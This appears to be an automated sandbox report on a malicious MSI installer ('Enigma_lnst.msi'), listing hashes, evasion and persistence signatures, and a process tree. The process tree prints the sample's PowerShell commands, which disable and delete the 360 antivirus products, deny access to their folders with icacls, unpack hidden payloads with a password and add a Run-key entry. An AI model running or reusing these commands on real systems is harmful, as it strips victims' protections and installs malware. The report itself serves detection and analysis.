Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 17:57
Static task
static1
Behavioral task
behavioral1
Sample
Enigma_lnst.msi
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Enigma_lnst.msi
Resource
win7-20240704-en
Behavioral task
behavioral3
Sample
Enigma_lnst.msi
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
Enigma_lnst.msi
Resource
win11-20240709-en
General
-
Target
Enigma_lnst.msi
-
Size
186.9MB
-
MD5
1befc9492cae2fa2ff5a89177e9d3063
-
SHA1
061f689bb3802cf3da9cb5f8658beb5895d5650f
-
SHA256
90cee7a2160a5506535b05a1da860b3db9270154a27b4614001a73921eb516f3
-
SHA512
c199d79049af3c486fcbe35d6ae0825a8c2cae134fec4fe740c55c3677b29b7527958aaaf1c44890472af0a8d9e0e0db1ed96ca979da0619e089ff2486038243
-
SSDEEP
3145728:L7y8IlnJhDfWQ3yIe3EPleGEHmdygafuvI2tc9XzlRn6lF+RQ+ZspLkOvnkBM+k6:i8oDfW6yIpPwGEHmdafuvXc9Bpe+S+6y
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ iusb3mon.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Wine rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Wine iusb3mon.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\USB3MON = "C:\\ProgramData\\iusb3mon.exe" iusb3mon.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation iusb3mon.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1516 iusb3mon.exe 4876 rundll32.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\My Product\Enigma_setup_2.2.3_x64.exe msiexec.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIF128.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57e01f.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIE138.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{03D03980-BCD0-46A2-A817-0A2C9A26545D} msiexec.exe File created C:\Windows\Installer\e57e021.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF967.tmp msiexec.exe File created C:\Windows\Installer\e57e01f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE996.tmp msiexec.exe -
Executes dropped EXE 3 IoCs
pid Process 3152 un.exe 3012 un.exe 1516 iusb3mon.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 4704 powershell.exe 3624 powershell.exe -
Loads dropped DLL 5 IoCs
pid Process 884 MsiExec.exe 884 MsiExec.exe 1516 iusb3mon.exe 884 MsiExec.exe 4876 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
pid Process 4120 msiexec.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000095515e1ae5238f530000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000095515e1a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090095515e1a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d95515e1a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000095515e1a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz iusb3mon.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings MsiExec.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 4616 msiexec.exe 4616 msiexec.exe 3624 powershell.exe 3624 powershell.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe 3624 powershell.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 1516 iusb3mon.exe 4876 rundll32.exe 4876 rundll32.exe 1516 iusb3mon.exe 1516 iusb3mon.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4120 msiexec.exe Token: SeIncreaseQuotaPrivilege 4120 msiexec.exe Token: SeSecurityPrivilege 4616 msiexec.exe Token: SeCreateTokenPrivilege 4120 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4120 msiexec.exe Token: SeLockMemoryPrivilege 4120 msiexec.exe Token: SeIncreaseQuotaPrivilege 4120 msiexec.exe Token: SeMachineAccountPrivilege 4120 msiexec.exe Token: SeTcbPrivilege 4120 msiexec.exe Token: SeSecurityPrivilege 4120 msiexec.exe Token: SeTakeOwnershipPrivilege 4120 msiexec.exe Token: SeLoadDriverPrivilege 4120 msiexec.exe Token: SeSystemProfilePrivilege 4120 msiexec.exe Token: SeSystemtimePrivilege 4120 msiexec.exe Token: SeProfSingleProcessPrivilege 4120 msiexec.exe Token: SeIncBasePriorityPrivilege 4120 msiexec.exe Token: SeCreatePagefilePrivilege 4120 msiexec.exe Token: SeCreatePermanentPrivilege 4120 msiexec.exe Token: SeBackupPrivilege 4120 msiexec.exe Token: SeRestorePrivilege 4120 msiexec.exe Token: SeShutdownPrivilege 4120 msiexec.exe Token: SeDebugPrivilege 4120 msiexec.exe Token: SeAuditPrivilege 4120 msiexec.exe Token: SeSystemEnvironmentPrivilege 4120 msiexec.exe Token: SeChangeNotifyPrivilege 4120 msiexec.exe Token: SeRemoteShutdownPrivilege 4120 msiexec.exe Token: SeUndockPrivilege 4120 msiexec.exe Token: SeSyncAgentPrivilege 4120 msiexec.exe Token: SeEnableDelegationPrivilege 4120 msiexec.exe Token: SeManageVolumePrivilege 4120 msiexec.exe Token: SeImpersonatePrivilege 4120 msiexec.exe Token: SeCreateGlobalPrivilege 4120 msiexec.exe Token: SeBackupPrivilege 2640 vssvc.exe Token: SeRestorePrivilege 2640 vssvc.exe Token: SeAuditPrivilege 2640 vssvc.exe Token: SeBackupPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe Token: SeTakeOwnershipPrivilege 4616 msiexec.exe Token: SeRestorePrivilege 4616 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4120 msiexec.exe 4120 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4616 wrote to memory of 4472 4616 msiexec.exe 94 PID 4616 wrote to memory of 4472 4616 msiexec.exe 94 PID 4616 wrote to memory of 884 4616 msiexec.exe 96 PID 4616 wrote to memory of 884 4616 msiexec.exe 96 PID 4616 wrote to memory of 884 4616 msiexec.exe 96 PID 884 wrote to memory of 4104 884 MsiExec.exe 97 PID 884 wrote to memory of 4104 884 MsiExec.exe 97 PID 884 wrote to memory of 4104 884 MsiExec.exe 97 PID 4104 wrote to memory of 1936 4104 cmd.exe 99 PID 4104 wrote to memory of 1936 4104 cmd.exe 99 PID 4104 wrote to memory of 1936 4104 cmd.exe 99 PID 884 wrote to memory of 4704 884 MsiExec.exe 100 PID 884 wrote to memory of 4704 884 MsiExec.exe 100 PID 884 wrote to memory of 4704 884 MsiExec.exe 100 PID 884 wrote to memory of 3624 884 MsiExec.exe 102 PID 884 wrote to memory of 3624 884 MsiExec.exe 102 PID 884 wrote to memory of 3624 884 MsiExec.exe 102 PID 884 wrote to memory of 3152 884 MsiExec.exe 104 PID 884 wrote to memory of 3152 884 MsiExec.exe 104 PID 884 wrote to memory of 3012 884 MsiExec.exe 106 PID 884 wrote to memory of 3012 884 MsiExec.exe 106 PID 884 wrote to memory of 1516 884 MsiExec.exe 108 PID 884 wrote to memory of 1516 884 MsiExec.exe 108 PID 884 wrote to memory of 1516 884 MsiExec.exe 108 PID 1516 wrote to memory of 2104 1516 iusb3mon.exe 109 PID 1516 wrote to memory of 2104 1516 iusb3mon.exe 109 PID 1516 wrote to memory of 2104 1516 iusb3mon.exe 109 PID 1516 wrote to memory of 4876 1516 iusb3mon.exe 111 PID 1516 wrote to memory of 4876 1516 iusb3mon.exe 111 PID 1516 wrote to memory of 4876 1516 iusb3mon.exe 111 PID 1516 wrote to memory of 2184 1516 iusb3mon.exe 113 PID 1516 wrote to memory of 2184 1516 iusb3mon.exe 113 PID 1516 wrote to memory of 2184 1516 iusb3mon.exe 113 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Enigma_lnst.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4120
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4472
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 93DE0A49FCB79BBEE6CAD9CA24428C232⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\fltMC.exefltmc.exe4⤵PID:1936
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360safe_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360sd_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
C:\ProgramData\Data\un.exe"C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar qbcore.dll C:\ProgramData\3⤵
- Executes dropped EXE
PID:3152
-
-
C:\ProgramData\Data\un.exe"C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\3⤵
- Executes dropped EXE
PID:3012
-
-
C:\ProgramData\iusb3mon.exe"C:\ProgramData\iusb3mon.exe" false3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\odbc.inst.ini4⤵PID:2104
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\qbcore.dll,cef_v8value_create_string4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵PID:2184
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2676
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Installer Packages
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Installer Packages
1Defense Evasion
Hide Artifacts
1Ignore Process Interrupts
1Modify Registry
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD565d5af85679d97a938a6b16357b68473
SHA1ac6389ab0a70232fb1d98d0c39f8ef606ffa8596
SHA256af68e5eccb79d3b61f60bec508b06b3ebb242cac0819322fff84aeb3a025d8e1
SHA512bbf9b913801e609b36a8703ee40b3f261f0db081a1af33365cdb7872ce4c4d4ef4287352b7208719842b4c20ebb9686ef5e8f3d4fbe3c658a2c9fe04015af9cb
-
Filesize
10B
MD551c11db1054dd4650a33bf481ec27060
SHA117686b75163d8753be27e407aad97a76f311fc7b
SHA256fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35
SHA51294d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f
-
Filesize
601KB
MD54fdc31997eb40979967fc04d9a9960f3
SHA17f13bd62c13324681913304644489bb6b66f584a
SHA256e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2
SHA51215146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a
-
Filesize
2.3MB
MD56902353b10ae3b51d0d4dce6711bdc5e
SHA12c4abeda0be51037d90abdd22ce46660dc84a0fb
SHA256525c842b1e10058e35b28593bcf2efd8b62e0587d5e0fc27e4289cdafaa9119a
SHA512fb7d0590934ee8cb28dca9b4e0c3d2ee751ecfeeaaa5d399cc01c147c1ff051b58b23f88bced572000db8516ec47b84c6a6604131d69a6dd9e80c010b482b047
-
Filesize
356KB
MD5fae472e4f35ea37d87ec8e75f8f87424
SHA1dc4cecc39dcda0f27208d976f4c890aca60d38de
SHA256ece4bdb4d10691514983e689e00fe376cd96d47b59c19d418514df6e075635b0
SHA5126bdc5e60d917007c5970cde0fe0d8bdbaa6285e8351968bba0db5c42230448a2d6028e4f1d29bfbb72224a7bdc10c85d45614a113896d4eaebead949990df845
-
Filesize
604KB
MD575ff06aa5acfa803ad99b4fdcc43dd68
SHA18a120948f1e30fa8a2ef0d839c5300bbdfa9a8e4
SHA256a09ee1f7481c2f215c3a1d2335c5181fcf52eea7c9d82bb885cb14dc419d4e51
SHA51271216288e436dab8d824cd9eb300286095687d855f5beb4e2732a8ef90c7536fad2d82ee61373e85a65a8950ce5979757518578d522bad6bd8496b363b9ead3c
-
Filesize
2.7MB
MD5c31ab7e7b6832f1b99d6914e1594eb6d
SHA1ccc6f7e864548b9a7cbb5118c75e5f90db14ac5d
SHA2563bda309984263aa5517dec01fbed324aaec44b514173aa7263cc9d2e0d2a5e73
SHA512ff358abab061cc85bb1f51fc6a4a954f46bcf79863728c83b023cecfda2e7f4b61b8d30fe609af3f7bf01b2c23be417eb22f71d7e68b35749d78b85083469f99
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
16KB
MD50e5c309790822c256e0386bae40fdb4d
SHA1915d7770b22ed734cae57dcb50b403ccf5e23628
SHA25692700714dc349086d41e7fd278e6366242eb745a93ce3dbcc7ab55dbf4fdd8cf
SHA5122f8dd04ac522a5216688e236da9582911539d542daa7e139bc94974884d3aba435ac919f42a7106965778f2734c0b25f2a8f0731540900683b7b3d77da7ad58e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
990KB
MD5b9ff2dd6924711531e59e90581cda548
SHA16c8d572587c40a1fd8c20bd4f1929bb0fbb12009
SHA256ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7
SHA512d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
23.7MB
MD5cfd7b17cde52d2aabdafc5fbe8c22eca
SHA1a739b299e81991c50f567b62795e715bb238f14e
SHA256fc9b9c75ca9aa253627bf27ce87c77cfe51184153cfa9cd7febb24fbb97c7796
SHA5120e5cda7c2699f8404e5b2b7086bda0619cf390737480a3aa019bff27f954f934c51365aae2915d405bf5a6e927d7da0b229a586b2a50c16720d51254be93fcdd
-
\??\Volume{1a5e5195-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{cf028c4a-7b9b-4629-a2cb-55f6111428c0}_OnDiskSnapshotProp
Filesize6KB
MD560655917a1eea18e7ba977ca59c86b26
SHA122c24567fd0121a2d6d214fe5011f937d7836606
SHA2565bd39a2532199284b7ca66d88d6536a02784e879d922eaf968764b1899da2a30
SHA512cd954f153ac5865c890d1d579c4086714a974c51f359c42e21714afc3e48ffe7491db1bef66a6a285a3da24d417037312451e0daf9cebe4cbcec2c838b789a73